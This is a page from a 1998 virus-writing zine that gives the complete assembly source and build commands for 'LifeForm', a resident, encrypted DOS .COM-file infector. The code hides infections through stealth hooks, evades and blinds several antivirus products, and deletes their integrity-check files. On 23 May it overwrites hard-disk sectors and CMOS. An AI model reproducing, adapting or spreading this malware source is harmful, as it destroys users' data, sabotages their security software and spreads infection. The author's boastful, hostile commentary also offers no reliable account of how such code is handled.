Copy Link
Add to Bookmark
Report
The LifeForm virus
H0l0kausT Issue 1
; Virus Name: LifeForm
; Author : ThE_WiZArD
; Origin : Spain, 1998.
; Lenght : 2101 bytes aprox.
;
;
;
;⁄ƒƒƒƒƒƒƒƒƒƒƒƒø
;≥ Features ≥
;¿ƒƒƒƒƒƒƒƒƒƒƒƒŸ
;
; -Memory Resident (MCB) Encrypted parasitic virus.
; -Infects .COM files on Closing (3EH).
; -Full Stealth (Disinfection on OPEN (3Dh) & DEBUGGIN (4B01H) and reinfects
; on CLOSING (3Eh) ).
; -FCB & DTA Stealth (sec = 62)
; -Time Stealth (AX=5700h), returns correct seconds.
; -Uses SFT`s to perform infection (less size and fuck TSR watchdogs).
; -Redirects Int03h to Int21h (less size and fuck debuggers).
; -Hook Int 24h to a dummy handler to hide errors.
; -Anti-Debug , Emulation and Anti-Heuristic Code.
; -Turns off VSAFE`s flags while infecting files and restore them later.
; -Breaks F-PROT's ability of detecting viruses (Thx to Wintermute)
; -When AVPLITE anti-virus is executed, the virus modifies the command line
; so, heuristic analysus stays disabled.
; -Disable Stealth when a compress util are running.
;
; -Delete CRC Checksums ( In current DIR )
;
; -> anti-vir.dat
; -> avp.crc
; -> chklist.tav
; -> chklist.ms
; -> ivb.ntz
; -> smartchk.cps
;
; On 23th May destroy random sectors of hard disk , cmos and displays
; a funny payload.
;
;
;
;Thx go to: 29A staff.
;
;Fucks go to: Well , they know who they are.
;
;
;
; ThE_WiZArD
; wizard555@hotmailcom
;
;
;-=[ "Information is the greatest weapon of power to the modern wizard." ]=-
;
; To assembly: TASM /M LifeForm.ASM
; TLINK LifeForm
; EXE2COM LifeForm.EXE LifeForm.COM
.286
LifeForm segment byte public
assume cs:LifeForm,ds:LifeForm
org 0h
LifeForm_size equ (LifeForm_end-LifeForm_start)
Crypt_Size equ (Crypt_End-Crypt_Start)
Size_SB equ (Size_Sin_Buffer-LifeForm_Start)
LifeForm_start label byte
Delta_ofs equ word ptr $+1
mov bp,0100h ;Delta offset (precalc)
cli
neg sp ;Mess with Stack
neg sp ;TBCLEAN SUCKS !
sti
;*****************************************************************************
; ANTI-HEURISTIC DECRYPTOR *
;*****************************************************************************
Decrypt:
lea si,[bp+offset Crypt_Start]
mov di,si
push si
xor ax,ax
mov bx,Crypt_size/2+2
Xor_LOOP:
xor word ptr cs:[di],0000h ;XOR It !
nop
int 3h ;Fool Debugging
inc ax
jmp Fuck_TBAV2 ;FUCK Thunderbyte AV
Fuck_TBAV1:
jmp Fuck_TBAV3
Fuck_TBAV2:
add di,2h
jmp Fuck_TBAV1
Fuck_TBAV3:
cmp ax,bx ;Are we at the end?
jbe Xor_Loop ;No .. continue
ret ;Return
Crypt_Start label byte
;*****************************************************************************
; FOOL TRACING / EMULATION *
;*****************************************************************************
No_Trace:
cli
push ax ;Anti-Trace routine !
push -1 ;TBCLEAN catch this ;-)
inc sp
dec sp
pop ax
inc ax
pop ax
jz Check_for_TSR
mov al,2Eh ;CMOS: 2EH -> Checksum
out 70h,al ;Corrupt Checksum
out 71h,al
hlt ;Halt computer
int 19h ;Reboot
;*****************************************************************************
; CHECK FOR NOVELL AND TSR *
;*****************************************************************************
Check_for_TSR:
mov ax,':?' ;Check for TSR ...
int 21h
cmp bx,':*' ;Are we already
jne Install_MCB ;memory resident ?
jmp Return_File
LifeForm_LiveS db '#ThE_WiZArD' ;Of Course
;*****************************************************************************
; ROUTINE TO GO TSR *
;*****************************************************************************
Install_MCB:
mov al,21h ;Get Int21h
call Get_Int
mov word ptr cs:[OldInt21h][bp],bx ;Save Int21h
mov word ptr cs:[OldInt21h+02h][bp],es
mov ax,ds
dec ax
mov ds,ax ;Program's MCB segment
xor di,di
cmp byte ptr ds:[di],'Y' ;Is it a Z block?
ja MCB_OK ;YES !!
jmp Return_File ;No .. Exit ..
MCB_OK:
sub word ptr ds:[di+3],((LifeForm_Size/10h)+2)
sub word ptr ds:[di+12h],((LifeForm_Size/10h)+2)
add ax,word ptr ds:[di+3]
inc ax
mov ds,ax
mov byte ptr ds:[di],'Z' ;Mark block as Z
mov word ptr ds:[di+1],8 ;System memory
mov word ptr ds:[di+3],((LifeForm_Size/10h)+1)
mov word ptr ds:[di+8],4f44h ;Mark block as owned
mov word ptr ds:[di+0ah],0053h ;by DOS (444f53h,0)
inc ax
cld
push cs
pop ds
mov es,ax
mov cx,LifeForm_SiZe ;Copy virus to memory
mov si,bp
rep movsb
;*****************************************************************************
; SET INTERRUPTION 21H *
;*****************************************************************************
Set_int21h:
push es
pop ds
mov al,21h
mov dx, offset Int21h_LifeForm
call Set_Int ;Set new Int21h
Return_File:
push cs cs
pop ds es
;*****************************************************************************
; RESTORE .COM file AND SET REGISTERS = 0 *
;*****************************************************************************
Exit_COM:
mov bx,bp
lea si,HEADER
add si,bx
mov ax,100h
xchg ax,di
push di ;Return to program ...
movsw ;Copy four bytes
movsw
Reset_Reg:
xor ax,ax
sub bx,bx ;Set registers to 0
mov cx,bx
mov dx,bx
xor di,cx
sub si,di
xor bp,bp
ret ;Return to host
;*****************************************************************************
; FCB STEALTH *
;*****************************************************************************
Fcb_Stealth:
pushf
call dword ptr cs:[OldInt21h] ;Call to INT 21h
test al,al ;Error ?
jnz fcb_out ;Jmp if error
call push_all
mov ah,51h ;Get current psp
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
mov es,bx ;Es=segment of psp
cmp bx,es:[16h] ;psp of COMMAND.COM?
jnz fcb_out1 ;no, then jmp
mov bx,dx ;DS:BX=FCB
mov al,[bx] ;1st byte of fcb
push ax ;save it
mov ah,2fh ;get DTA in ES:BX
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
pop ax ;get first byte
inc al ;al=ffh therefor al=ZR
jnz fcb_old ;if != ZR jmp
add bx,7h ;extended fcb here, +7
Fcb_old:
cmp word ptr es:[bx+09h],'OC' ;It`s a .COM file ?
jne Fcb_out1
mov al,es:[bx+17h] ;Get file time stamp
and al,1fh ;Unmask seconds field
xor al,1fh ;62 seconds ?
jnz fcb_out1
and byte ptr es:[bx+17h],0E0h ;Erase erronous sec.
Fcb_SUB:
sub word ptr es:[bx+1dh],Size_SB ;sub away virus_size
sbb word ptr es:[bx+1fh],0 ;Sub with carry flag
Fcb_out1:
call pop_all ;Restore registers
Fcb_out:
iret ;Return control
;*****************************************************************************
; NEW INTERRUPT 21h *
;*****************************************************************************
Int21h_LifeForm:
cli
push ax ;Anti-Trace routine !
push -1 ;Kasp :-P
inc sp
dec sp
pop ax
inc ax
pop ax
jz Tsr_Check
iret
Tsr_Check:
sti
cmp ax,':?' ;Check for TSR ?
jnz Int21h_Check
mov bx,':*' ;Return :* !
iret
Int21h_Check:
xchg ax,bx
cmp bh,11h ;FCB Stealth
je STEALTH_fcb
cmp bh,12h
je STEALTH_fcb
cmp bh,4Eh ;HANDLE Stealth
je STEALTH_Hnd
cmp bh,4Fh
je STEALTH_Hnd
cmp bx,4b00h ;DELETE CrC shit
je Delete_Shit
cmp bx,4b01h ;DISINFECT File
je Disinfection
cmp bh,3Dh ;DISINFECT File
je Disinfection
cmp bh,6Ch ;DISINFECT File
je Disinfection
cmp bx,5700h ;HIDE Erroneous sec.
je STEALTH_Sec
cmp bh,3fh ;Fuck F-PROT
je Stealth_READ
cmp bh,3Eh ;INFECT File
je Infection
xchg ax,bx
ExitInt21h:
db 0eah ;Exit ...
Oldint21h dw ?,? ;Original Int 21h
Oldint24h dw ?,? ;Original int 24h
OldInt03h dw ?,?
Newint24h:
mov al,3 ;Return error in
iret ;function
Stealth_FCB:
xchg ax,bx
jmp FCB_Stealth
Stealth_HND:
xchg ax,bx
jmp HANDLE_Stealth
Stealth_READ:
xchg ax,bx
jmp Shit_F_PROT
Delete_Shit:
xchg ax,bx
jmp Check_Names
Disinfection:
xchg ax,bx
jmp disinfect_file
Infection:
xchg ax,bx
jmp Infect_File
;****************************************************************************
; DATE/TIME STEALTH *
;****************************************************************************
Stealth_Sec:
xchg ax,bx
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
jnc ok_get_time
stc
retf 02h
ok_get_time:
push cx
and cx,1fh ;Unmask second field
xor cx,1fh ;62 seconds ?
pop cx
jne exit_get_time
or cl,01fh ;Changes seconds
exit_get_time:
clc
retf 02h
;*****************************************************************************
; HANDLE STEALTH *
;*****************************************************************************
Handle_Stealth:
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
jnc Handle_OK
stc
retf 02h
Handle_OK:
call push_all ;Push this shit !
call get_env
cmp ax,"-F" ;F-PROT (Fuck POTATOE)
jz not_infected
cmp ax,"RA" ;ARJ
jz not_infected
cmp ax,"AR" ;RAR
je not_infected
cmp ax,"KP" ;PK*
je not_infected
cmp ax,"HL" ;LHA
je not_infected
cmp ax,"AB" ;BACKUP
je not_infected
mov ah,2Fh ;get DTA
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
mov al,es:[bx+16h] ;Get file time stamp
and al,1fh ;Unmask seconds field
xor al,1fh
jnz not_infected
sub word ptr es:[bx+1ah],Size_SB ;Subs virus size
sbb word ptr es:[bx+1ch],0 ;and places coherent
and byte ptr es:[bx+16h],0F1h ;seconds
not_infected:
call pop_all ;Restore registers
retf 02h
;*****************************************************************************
; MAKE "F-PROT" DOESNT DETECT ANY VIRUS *
;*****************************************************************************
Avers db 'Quo vadis Fridrik? ... and you Frans still working on this shit.'
; Breaks F-prot's ability of detecting viruses: when it reads data from a
; file the virus sends the interrupt vector table , so F-prot doesn't
; detect any virus (Thx to Wintermute)
Shit_F_PROT:
call push_all
cmp al,1
jz Exit_READ
cmp bx,8
jnz Exit_READ
call get_env
cmp ax,"-F" ;F-PROT ?
jnz Exit_READ
call pop_all
pushf
call dword ptr cs:[Oldint21h]
call push_all
push ds dx
pop di es ;Send interrupt
xor si,si ;vector table
mov ds,si
rep movsb
call pop_all ;Quo Vadis Fridrik ?
retf 2
Exit_READ:
call pop_all
jmp ExitInt21h
;*****************************************************************************
; RUTINE TO INFECT *
;*****************************************************************************
Infect_File:
cmp bx,4h ;Erroneous handle ?
ja Infect_OK
jmp ExitInt21h ;Bye Bye .. !
Error: jmp Exit
Infect_OK:
call push_all ;Save this shit ;)
call Disable_KB ;Disable Keyboard
call Set_Int03h ;Set NewInt03h
call Vsafe_off ;Turn off Vshit ;)
mov ah,45h
int 03h ;Duplicate handle
Close_Cont:
xchg bx,ax
push ax
mov ah,3Eh ;Close new handle in
int 03h ;order to update
pop bx ;directory entry
call Get_SFT ;Get Da`SFT
Check_File:
cmp word ptr es:[di+28h],'OC' ;It is a .COM file ?
jnz Error
Check_Size:
cmp word ptr es:[di+11h],0F63Bh ;It is > 63k ?
ja Error
call Check_Infect ;It is infected ?
jc Error
Check_COMM:
mov ax,word ptr es:[di+20h] ;COMMAND.COM ?
cmp ax,'OC'
jnz Save_Stuff
mov ax,word ptr es:[di+22h]
cmp ax,'MM'
jz Error
Save_Stuff:
mov cx,2h ;Save and set file
xchg cx,word ptr es:[di+02h] ;open mode (R/W)
push cx
xor al,al ;Save and set file
xchg al,byte ptr es:[di+04h] ;atribute
push ax
push word ptr es:[di+15h] ;Save file pointer
push word ptr es:[di+17h] ;position
in ax,40h ;Get Encryption KEY
or ax,ax
jnz Key_OK
inc ax
Key_Ok:
mov word ptr cs:[Clave],ax ;Save key
Read_Header:
call Lseek_START
push cs
pop ds ;CS=DS
mov ah,3fh
mov cx,4h
lea dx,Header ;Read first 4h bytes
int 03h
Check_Header:
mov cx,word ptr cs:[Header+00h]
add cl,ch ;Add markers M+Z
cmp cl,"Z"+"M" ;It`s an .EXE file ?
jne Infect_COM
jmp Restore
Infect_COM:
cmp word ptr cs:[Header+00h],20CDh ;Int20h Instruction ?
jz Restore ;Exit !
cmp byte ptr cs:[Header+00h],90h ;InVircible bait?
jz Restore ;Exit !
call Lseek_END
mov delta_ofs,ax ;Store Delta Offset
add delta_ofs,100h
sub ax,3h
mov word ptr cs:[jump_address+1],ax ;Set the JMP Address
push di bx es cs ;Save Stuff
pop es ;CS=ES
cld
mov di,offset XOR_LOOP ;DI= Our Buffer
mov word ptr es:[DI],812Eh ;XOR WORD PTR CS:
inc di
inc di
Gen_INDEX_DI:
mov byte ptr es:[DI],35h ;[DI]
inc di
Gen_KEY:
mov ax,word ptr cs:[Clave] ;Move the decryption
stosw ;KEY
call Copy&Crypt ;Copy & Encrypt virus
pop es bx di
call Lseek_END
call Set_Int24h ;Set NewInt24h
mov ah,3Fh ;Write Virus
inc ah
lea dx,Buffer ;Encrypted virus
mov cx,Size_SB ;Virus size
int 03h
jc Restore
call Lseek_START
mov ah,3Fh
inc ah
lea dx,Jump_Address ;Write JMP
mov cx,4h
int 03h
call Rest_Int24h
Restore:
pop word ptr es:[di+17h] ;Restore file pointer
pop word ptr es:[di+15h] ;position
pop ax ;Restore file
mov byte ptr es:[di+04h],al ;atribute
pop cx ;Restore file open
mov word ptr es:[di+02h],cx ;mode
call Res_Stuff
Exit:
call Vsafe_on
call Rest_Int03h
call Enable_KB
call pop_all ;Restore this shit !
jmp ExitInt21h ;Exit ...
;****************************************************************************
; DISINFECTION *
;****************************************************************************
Disinfect_file:
call push_all ;Save this shit ;-)
call Set_Int03h
cmp ax,6c00h ;Extended open ?
jz extended
mov si,dx
Extended:
mov di,ds
call Vsafe_Off ;Turn OFF Vshit
Open_Dsf:
mov ds,di ;Opens the file !
mov dx,si
xor cx,cx
mov ax,3D00h
int 03h
jnc Open_OK
jmp Exit
Open_OK:
call Set_Int24h
xchg ax,bx
call get_sft ;Get Da`SFT
jc Error_Dsf
cmp word ptr es:[di+28h],'OC' ;It is a .COM file ?
jnz Error_Dsf
Check_Inff:
call Check_Infect ;Is it infected ?
jc Save_This
Error_Dsf:
jmp Exit_Close
Save_This:
call Disable_KB
mov cx,2h ;Save and set file
xchg cx,word ptr es:[di+02h] ;open mode (R/W)
push cx
xor al,al ;Save and set file
xchg al,byte ptr es:[di+04h] ;atribute
push ax
push word ptr es:[di+15h] ;Save file pointer
push word ptr es:[di+17h] ;position
push cs ;CS=DS
pop ds
call Lseek_START
mov ah,3fh
mov cx,4h
lea dx,Header ;Read first 4 bytes
int 03h
mov cx,word ptr cs:[Header+00h]
add cl,ch ;Add markers M+Z
cmp cl,"Z"+"M" ;It`s an .EXE file ?
jz Rest_all
Read_OrigHeader:
mov ax,word ptr es:[di+11h] ;Get filesize
sub ax,4h ;Lseek 4 bytes before
mov word ptr es:[di+15h],ax ;end
mov ah,3fh
mov cx,04h ;Read original header
lea dx,Header
int 03h
call Lseek_START
Write_OrigHeader:
mov ah,3fh ;Write original
inc ah ;Header
mov cx,4h ;COM header
lea dx,Header
int 03h
call Lseek_END
call Res_Time&Lenght
Rest_all:
pop word ptr es:[di+17h] ;Restore file pointer
pop word ptr es:[di+15h] ;position
pop ax ;Restore file
mov byte ptr es:[di+04h],al ;atribute
pop cx ;Restore file open
mov word ptr es:[di+02h],cx ;mode
call Res_Stuff
Exit_Close:
mov ah,3eh ;Close file
int 03h
call Rest_Int24h
jmp exit
;*****************************************************************************
; ADD PARAMETERS TO COMMAND LINE OF AVP *
;*****************************************************************************
check_names:
call push_all
mov si,dx
find_ext:
lodsb
cmp al,'.' ;Scan for the dot in
jne find_ext ;the filename
std
lodsw
xor cx,cx
mov di,offset AV_scanner - 1
push cs
pop es
name_loop:
mov cl,byte ptr cs:[di] ;CS:DI = size of
dec di ;String
push si
repe cmpsb ;Compare the names
pop si
je found_name ;Found AVP ?
sub di,cx
cmp di,offset found_avplite
jbe tail_1_fail
jmp short name_loop
found_name:
cmp di,offset found_avplite ;AVPlite
jbe avplite_fix
jmp short tail_1_fail
avplite_fix:
cld ;Change command line
pop es
push es ;ES = param block
;Segment
mov di,word ptr es:[bx+2] ;Get command tail from
mov si,di ;Param block
mov ax,word ptr es:[bx+4]
mov es,ax
mov ds,ax ;Command tail!
inc di ;Increase till we are
;past tail count
cmp byte ptr [si],0 ;Any parameters ??
je avplite_tail
mov cx,127 ;Tail length
mov al,0dh
repne scasb
jne tail_1_fail
avplite_tail:
add byte ptr [si],8 ;Move our pointer?
push cs
pop ds
mov si,offset avplite_cmd ;AV param to add?
mov cx,9
rep movsb
tail_1_fail:
cld ;Ready to finish up?
call pop_all
jmp Delete_CrC
;****************************************************************************
; SAVE ALL REGISTERS IN THE STACK *
;****************************************************************************
Push_all:
cli
pop word ptr cs:[ret_off]
pushf
push ax
push bx
push cx
push dx
push bp
push si
push di
push es
push ds
push word ptr cs:[ret_off]
sti
ret
;****************************************************************************
; RESTORE ALL REGISTERS FROM THE STACK *
;****************************************************************************
Pop_all:
cli
pop word ptr cs:[ret_off]
pop ds
pop es
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
popf
push word ptr cs:[ret_off]
sti
ret
ret_off dw 0000h
;*****************************************************************************
; GET SYTEM ENVIRONMENT *
;*****************************************************************************
Get_Env:
mov ah,62h
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
dec bx
mov es,bx
mov ax,word ptr es:[0008h]
ret
;*****************************************************************************
; SET NEW INTERRUP 24h AND REDIRECT INT 21H OVER INT 03H *
;*****************************************************************************
Set_Int03h:
push ax bx ds es cs
pop ds
mov al,03h ;Get Int03h
call get_int
mov word ptr ds:[OldInt03h],bx ;Save it
mov word ptr ds:[OldInt03h+02h],es
mov dx,offset Call_Int21h ;Redirects to Int21h
call set_int
pop es ds bx ax
ret
Rest_Int03h:
push ax dx ds
mov al,03h ;Restore Int03h
lds dx,dword ptr cs:[OldInt03h]
call set_int
pop ds dx ax
ret
Set_Int24h:
push ax bx ds es cs
pop ds
mov al,24h ;Get Int24h
call get_int
mov word ptr ds:[OldInt24h],bx ;Save it
mov word ptr ds:[OldInt24h+02h],es
mov dx,offset NewInt24h ;Redirect to a dummy
call set_int ;routine ;)
pop es ds bx ax
ret
Rest_Int24h:
push ax dx ds
mov al,24h ;Restore Int24h
lds dx,dword ptr cs:[OldInt24h]
call set_int
pop ds dx ax
ret
;*****************************************************************************
; RETURN THE <AL> VECTOR in <ES:BX> *
;*****************************************************************************
Get_int:
push ax
xor ah,ah
rol ax,1
rol ax,1
xchg bx,ax
xor ax,ax
mov es,ax
les bx,dword ptr es:[bx+00h]
pop ax
ret
;*****************************************************************************
; SET <AL> INTERRUPT VECTOR to <DS:DX> *
;*****************************************************************************
Set_int:
push ax
push bx
push ds
cli
xor ah,ah
rol ax,1
rol ax,1
xchg ax,bx
push ds
xor ax,ax
mov ds,ax
mov word ptr ds:[bx+00h],dx
pop word ptr ds:[bx+02h]
sti
pop ds
pop bx
pop ax
ret
;*****************************************************************************
; LSEEK ROUTINES *
;*****************************************************************************
Lseek_START:
mov word ptr es:[di+15h],00h ;Lseek to Start
ret
Lseek_END:
mov ax,word ptr es:[di+11h] ;File length
mov word ptr es:[di+15h],ax ;Lseek to end
ret
;*****************************************************************************
; ROUTINE TO GET SFT *
;*****************************************************************************
Get_SFT:
push bx ;Save File Handle
mov ax,1220h ;Get the Job File Table
int 2fh ;(JFT)
mov ax,1216h ;Get System File Table
mov bl,es:[di] ;system file table entry
int 2fh ;(LIST) number
pop bx ;Restore the Handle
ret
;*****************************************************************************
; RUTINE CHECK INFECT *
;*****************************************************************************
Check_Infect:
clc
mov cx,word ptr es:[di+0dh] ;Time from SFT
mov dx,word ptr es:[di+0fh] ;Date from SFT
mov word ptr cs:[org_time],cx ;Save original time
mov word ptr cs:[old_date],dx ;Save file date
or cl,1fh
mov word ptr cs:[old_time],cx ;Save file time (62s)
mov cx,word ptr cs:[org_time] ;Get original time
and cl,1fh
xor cl,1fh ;62 sec ?
jnz Ret_No ;File infected
stc
Ret_No:
ret
;*****************************************************************************
; RUTINE TO RESTORE STUFF *
;*****************************************************************************
Res_Stuff:
mov cx,word ptr ds:[old_time] ;Restore file time
mov dx,word ptr ds:[old_date] ;Restore file date
mov ax,5700h
inc ax
int 03h
ret
Res_Time&Lenght:
push ax
sub ax,06h ;Lseek 06 bytes before
mov word ptr es:[di+15h],ax ;end
mov ah,3fh
mov cx,2 ;Read original TIME
mov dx,offset ds:[Old_Time] ;Save it
int 03h
pop ax ;File length
sub ax,Size_SB ;Sub virus size
mov word ptr es:[di+15h],ax ;Lseek to end of
mov ah,3fh ;real file
inc ah
xor cx,cx
int 03h ;Remove the virus
ret
;*****************************************************************************
; RUTINE TO COPY AND ENCRYPT THE VIRUS *
;*****************************************************************************
Copy&Crypt:
xor si,si ;Copy virus to buffer
mov di,offset Buffer
mov cx,Size_SB/2+1 ;Virus size
repe movsw
mov si,(offset Buffer+(Crypt_Start-LifeForm_Start)) ;Our Buffer
mov di,si
mov cx,Crypt_size/2+1 ;Virus size
mov dx,word ptr cs:[Clave] ;Key
Encrypt:
xor word ptr [di],dx ;Encrypts the copy
movsw
loop Encrypt
ret
;*****************************************************************************
; RUTINE TO CALL INT_21h *
;*****************************************************************************
Call_Int21h:
pushf
call DWORD PTR cs:[OldInt21h] ;Call Int 21h
retf 02h
;*****************************************************************************
; FUCK VSAFE ANTIVIRUS *
;*****************************************************************************
Vsafe_OFF:
push bx cx dx
mov ax,0fa02h ;Turn off VSAFE's flags
mov dx,5945h
mov bl,00000000b ;New flags :-)
int 03h
mov byte ptr cs:[VShit],cl ;Save flags.
pop dx cx bx
ret
Vsafe_ON:
push bx cx dx
mov ax,0fa02h
mov dx,5945h ;Restore VSAFE's flags
mov bl,byte ptr cs:[VShit]
and bl,11111011b ;Turn off write-protected
int 03h ;flag (cache stuff)
pop dx cx bx
ret
;*****************************************************************************
; DISABLE/ENABLE KEYBOARD *
;*****************************************************************************
Disable_KB:
in al,21h
or al,00000010b
out 21h,al ;Disable KeyBoard
ret
Enable_KB:
in al,21h ;Enable KeyBoard
and al,not 2
out 21h,al
ret
;*****************************************************************************
; DELETE CRC FILES *
;*****************************************************************************
Delete_crc:
call push_all
call Set_Int03h ;Set new Int24h & 03h
call Set_Int24h
call Vsafe_Off
Check_Date:
mov ah,2bh ;Get Date
dec ah
int 03h
cmp dx,0517h ;23th May ?
jne Delete_CONT
call Rest_Int24h
call Rest_Int03h ;Restore Int24h & 03h
call pop_all
jmp PAYLOAD ;Go to PAYLOAD !!
Delete_CONT:
push cs
pop ds
xor cx,cx
lea dx,kill_msav ;Chklist.ms
call kill_crc_files
lea dx,kill_tbav
call kill_crc_files
lea dx,kill_smartchk ;Smartchk.cps
call kill_crc_files
lea dx,kill_avp ;Avp.crc
call kill_crc_files
lea dx,kill_ivb ;Ivb.ntz
call kill_crc_files
lea dx,kill_chklist ;Chklist.tav
call kill_crc_files
Exit_Delete:
call Vsafe_ON
call Rest_Int24h
call Rest_Int03h ;Restore Int24h & 03h
call pop_all
jmp ExitInt21h
kill_crc_files:
mov ax,4300h ;Clear Atributes
inc ax
int 03h
mov ah,41h ;Delete File
int 03h
retn
;*****************************************************************************
; DATA ABOUT ANTI-ANTIVIRUS *
;*****************************************************************************
; Names of antivirus
found_avplite db 'AVPLITE',7 ;AntiVirusPro
Av_Scanner:
; CRC files to delete!
kill_tbav db 'ANTI-VIR.DAT',0
kill_msav db 'CHKLIST.MS',0
kill_smartchk db 'SMARTCHK.CPS',0
kill_avp db 'AVP.CRC',0
kill_ivb db 'IVB.NTZ',0
kill_chklist db 'CHKLIST.TAV',0
; Parameters to ADD on the command line!
avplite_cmd db ' /h',0dh ;Skip heuristic scan
;*****************************************************************************
; !! ACTIVATION ROUTINE !! *
;*****************************************************************************
PAYLOAD:
call Disable_KB
mov ax,0002h ;Clear Screen
int 10h
call push_all
push cs cs
pop ds es
PREP_VIDEO:
mov ah,13h ;Set values
mov al,0
mov bh,0
mov bl,14
mov cx,45
mov dh,8 ;Line
mov dl,14 ;Position
lea bp,MENSAJE
int 10h ;Print messagge
mov bl,0fh
mov cx,52
mov dh,12
mov dl,10
lea bp,MENSAJE2 ;Messagge
int 10h ;Print messagge
mov cx,57
inc dh
lea bp,MENSAJE3 ;Messagge
int 10h ;Print messagge
call pop_all
;*****************************************************************************
; DESTROY THE HARDDISK *
;*****************************************************************************
Rip_hd:
xor dx, dx ;Clear dx
Rip_hd1:
mov cx, 1 ;Track 0, sector 1
mov ax,5000h
mov bx,0311h
xchg ax,bx
mov dl,80h
mov es,bx
int 13h ;Kill 17 sectors
jae rip_hd2
xor ah, ah
int 13h ;Reset disks if needed
Rip_hd2:
inc dh ;Increment head number
cmp dh, 4 ;If head number is below 4
jb rip_hd1 ;then go kill another 17
inc ch ;sectors increase track
cmp ch,69h ;number ... 69 tracks ?
jb rip_hd
kill_cmos1:
mov bp,7C00h
mov cx,29Ah ;Hello Dudes !
kill_cmos2:
mov al,cl
out 70h,al ;CMOS !!
xor al,al
out 71h,al ;Overwrite CMOS
loop kill_cmos2
jmp $ ;I love this ;)
MENSAJE DB 'ƒƒ [LifeForm] coded by ThE_WiZArD (1998) ƒƒ'
MENSAJE2 DB 'Cooler than a body on ice, Hotter than a rollin`dice'
MENSAJE3 DB 'Wilder than a drunken fight ... You`re gonna burn tonight'
Clave dw 0
Today db 0
Vshit db 0
Jump_address db 0E9h,90h,90h,01h ;JMP Address
Crypt_end label byte
DoNothing dw 0
Old_date dw 0 ;File date
Old_time dw 0 ;File time
Org_time dw 0
HEADER db 0CDh,020h,90h,01h ;Original 4 bytes
Size_Sin_Buffer:
Buffer db (offset Buffer-offset LifeForm_Start) dup (0)
LifeForm_end label byte
LifeForm ends
end LifeForm_start
